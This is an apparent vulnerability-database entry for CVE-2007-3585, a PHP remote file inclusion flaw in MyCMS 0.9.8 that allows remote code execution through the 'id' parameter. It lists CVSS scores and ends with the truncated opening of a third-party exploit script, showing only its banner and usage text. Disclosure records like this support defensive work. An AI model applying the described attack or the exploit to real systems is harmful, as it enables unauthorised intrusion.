7.5
CVSSv2

CVE-2007-3585

Published: 05/07/2007 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in games.php in MyCMS 0.9.8 and previous versions allows remote malicious users to execute arbitrary PHP code via a URL in the id parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

mycms mycms

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo " MyCMS <= 098 Remote Command Execution Exploit (2 method) by BlackHawk <hawkgotyou@gmailcom> <itablackhawkaltervistaorg> Thanks to rgod for the php code and Marty for the Love "; if ($argc<3) { echo "Usage: php "$argv[0]" Host Path CMD Host: target server ( ...